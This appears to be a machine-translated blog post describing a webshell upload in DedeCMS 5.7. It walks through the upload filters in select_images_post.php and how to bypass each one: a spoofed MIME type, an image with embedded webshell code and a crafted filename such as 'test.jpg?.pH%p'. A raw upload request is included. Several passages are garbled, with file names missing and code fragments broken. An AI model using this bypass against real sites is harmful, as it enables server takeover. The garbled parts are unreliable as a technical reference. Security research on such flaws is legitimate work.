v5.7 foreground chicken ribs & background getshell vulnerability

Posted by millikan at 2020-03-15

Official download of the latest installation package

Zhimeng 5.7 member center, due to security issues, restricts registered members to upload pictures when they publish information in the member center, but the administrator will not be affected when they log in the member center to publish information. How to solve it? Let's explain the specific solution. First of all, the specific problem is that the registered members click the image upload, preview and select the map, and then click upload to the server. The results are as follows: Failed to upload the picture. The submit button does not jump to the corresponding image property interface after uploading the picture normally. Only a scroll bar pops up in the current window. The above scroll bar prompts "prompt: you need to enter the background management directory to log in", but we can't see the prompt because the height of the scroll bar is limited. To view the specific promotion information, please click the down scroll bar all the way down to display the text prompt. As shown in the figure: now it's easy to solve the problem after knowing the specific reason. Directly search all the files under the program folder of Zhimeng website that contain "prompt: you need to enter the background management directory to log in" and find the file include / dialog / config.php. There's a piece of code

//检验用户登录状态  $cuserLogin = new userLogin();    if($cuserLogin->getUserID() <=0 )  {  if(emptyempty($adminDirHand))  {  ShowMsg( 提示:需输入后台管理目录才能登录请输入后台管理目录名: width:120px;  /> ,  javascript:; );  exit();  }  $gurl =  ../../{$adminDirHand}/login.php?gotopage= .urlencode($dedeNowurl);  echo  location= $gurl ; ;  exit();  }

Therefore, if dedecms5.7 wants to upload pictures, it must be done according to the above. Here we follow this rule, and think that the administrator has enabled the permission of uploading pictures for members. If it is lower than 5.7, just open the member center

The image horse that needs to be processed in Windows environment is because (after bypassing the file suffix detection, PHP GD's rendering and processing of the image will lead to the dislocation and failure of webshell code, so special image horse needs to be bypassed, and the image horse needs to be made)

Vulnerability file: include \ dialog \ select \ images \ post.php


Let's take a look at the package it introduced to better read the general code later.

Location: include \ dialog \ config.php


Continue tracking files

Location: include \

if($_FILES) {    require_once(DEDEINC.'/'); }

After this file, you can finally see a function, and the function is written above, but it also has the function of filtering out some illegal functions and following in.

You can see under include \

$cfg_not_allowall = "php|pl|cgi|asp|aspx|jsp|php3|shtm|shtml";

The type of upload forbidden is blacklist.

Look down again

$imtypes = array    (        "image/pjpeg", "image/jpeg", "image/gif", "image/png",        "image/xpng", "image/wbmp", "image/bmp"    );    if(in_array(strtolower(trim(${$_key.'_type'})), $imtypes))    {        $image_dd = @getimagesize($$_key);        if (!is_array($image_dd))        {            exit('Upload filetype not allow !');        }    }

It can be seen here that it determines the type of image upload. This bypass only needs to modify the HTTP header.

The headache is the getimagesize function, which is used to get image size and related information.

Take a look at the file select [Images] post.php above

$imgfile_name = trim(preg_replace("#[ \r\n\t\*\%\\\/\?><\|\":]{1,}#", '', $imgfile_name));

It's regular substitution.

If you upload in that place, will allow it, but xxx.php will fail.

Because the above is written as regular, the bypass method is also very simple as long as it is not equal to the content of the blacklist. For example, pH% P and so on!

Look at the next line of code

if(!preg_match("#\.(".$cfg_imgtype.")#i", $imgfile_name))

The code here is not rigorous. It only verifies the blacklist once, and the name of the constructed image is test.jpg?. pH% p

Environment: Linux + phpstudy

Upload picture grab

POST /dedecms/include/dialog/select_images_post.php?CKEditor=body&CKEditorFuncNum=2&langCode=zh-cn HTTP/1.1 Host: ******* Content-Length: 42080
Cache-Control: max-age=0
Origin: http:Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.98 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryZNrPDjZXsDjHXAYJ
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*dedecms/dede/archives_add.php?channelid=6&cid=0 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.8
Cookie: ***
Connection: close ------WebKitFormBoundaryZNrPDjZXsDjHXAYJ Content-Disposition: form-data; name="upload"; filename="test.jpg"Content-Type: image/jpeg ******* ------WebKitFormBoundaryZNrPDjZXsDjHXAYJ--

Then change the filename

Then visit the

0x03 thank you.

This article thanks wind and phpoop for their help in code analysis! Why do you say that the background can get shell? Because the foreground editor calls the background editor, you only need to comment out the foreground to get shell!

Our company is not responsible for the above information